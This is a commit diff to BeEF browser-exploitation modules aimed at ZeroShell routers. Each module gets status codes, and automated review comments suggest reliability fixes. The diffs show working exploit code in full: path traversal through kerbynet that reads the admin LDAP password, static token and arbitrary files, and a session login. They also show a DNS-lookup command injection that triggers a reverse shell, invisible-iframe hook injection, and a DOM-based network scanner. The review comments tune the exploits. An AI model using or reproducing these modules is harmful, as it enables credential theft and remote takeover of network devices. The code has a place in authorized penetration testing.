Add beef.are.status_success(), beef.are.status_error() or beef.are.status_unknown() status code returned to each beef.net.send() for ZeroShell's modules.

Yann CAM
2016-10-06 10:33:17 +02:00
parent 861e846dbe
commit 528e00bf6e
8 changed files with 35 additions and 35 deletions


@@ -10,24 +10,24 @@ beef.execute(function() {
var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";
var pwd = "";
var token = "";
beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
if(response1.status_code == 200){
pwd = response1.response_body.trim();
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
if(response2.status_code == 200){
token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
}
});
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
}
});
});
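Review bot: The "Admin token retrieved" send reports `beef.are.status_success()` whenever the POST returns 200, even when `STk=` is absent from the body. In that case `indexOf` returns -1, and `substr(3, 40)` yields unrelated page text that is recorded as a token with a success status. Since this commit exists to give each result a trustworthy status, compute `var idx = response2.response_body.indexOf("STk=");` first and send `beef.are.status_error()` when `idx === -1`. The same unguarded extraction appears in the second hunk of the DNS-lookup reverse-shell module further down. The enclosing `beef.execute` callback begins above this hunk.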


@@ -5,16 +5,16 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});
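Review bot: `beef.are.status_success()` depends only on `response.status_code == 200`, so an empty body or an error page served with 200 is recorded as a successful retrieval. An empty `response.response_body` should map to `beef.are.status_unknown()` instead. The static-token and file-read modules in the next two sections have the same condition. A comment above the send would also help, e.g. `// result carries the retrieved secret; treat the stored command results as sensitive`, because the value is passed verbatim to the command URL and is presumably kept with the command's results on the server.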


@@ -5,16 +5,16 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});


@@ -5,17 +5,17 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var rfile = '<%= @rfile %>';
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
}
});
});


@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
@@ -14,5 +14,5 @@ beef.execute(function() {
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
iframe_<%= @command_id %>.setAttribute('src', target);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.are.status_unknown());
});


@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
@@ -20,27 +20,27 @@ beef.execute(function() {
beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
if(response1.status_code == 200){
pwd = response1.response_body.trim();
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
if(response2.status_code == 200){
token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, {
Action: "Lookup",
Section: "DNS",
DNS: "localhost",
STk: token,
What: payload
What: payload
}, 10, 'script', false, null, function(response3){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
}
);
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
}
});
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
}
});
});
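Review bot: The "Reverse shell should have been triggered" send pairs an `OK:` prefix with `beef.are.status_unknown()`, so the message text and the status disagree about the outcome. The callback never inspects `response3`, so `unknown` is the accurate one and the text should match it, e.g. `"result=Reverse shell should have been triggered (not verified)."`. That would also line up with the hook-delivery module's message, which carries no `OK:` prefix. The iframe-based reverse-shell module in the next section has the same mismatch.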


@@ -5,7 +5,7 @@
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
@@ -15,5 +15,5 @@ beef.execute(function() {
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
iframe_<%= @command_id %>.setAttribute('src', target);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
});


@@ -71,11 +71,11 @@ beef.execute(function() {
var div = document.createElement('div'); // Hidden div container
div.setAttribute('style', 'display:none;');
document.body.appendChild(div);
add = function(data){
result += data + " ";
}
// Scan function to inject <img> markups in victim's DOM.
// This function is recalled by herself to scan each IP bloc of the IP range defined
scan = function(){
@@ -91,13 +91,13 @@ beef.execute(function() {
i++;
}
var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc
// Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited.
getResult = function(){
if(result.trim() != "")
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success());
else
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown());
div.innerHTML = ""; // Clean the current DOM's div
result = ""; // Clear the result of the bloc tested for the next loop
}
@@ -107,9 +107,9 @@ beef.execute(function() {
else // We have reach the last IP address to scan
setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete
document.body.removeChild(div);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success());
}, timeout*2);
}
scan(); // Run the first bloc scan
});
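Review bot: The final "Scan is complete" send reports `beef.are.status_success()` unconditionally, so a scan in which every bloc was reported with `status_unknown()` still ends on a success status. If the consumer of these statuses keys on the last one received for the command (not visible in this hunk), an empty scan is indistinguishable from a positive one. Setting a flag in `getResult` when `result.trim() != ""` and sending `found ? beef.are.status_success() : beef.are.status_unknown()` with the completion message would keep the per-bloc and final statuses consistent. The `scan` function body lies partly outside these hunks.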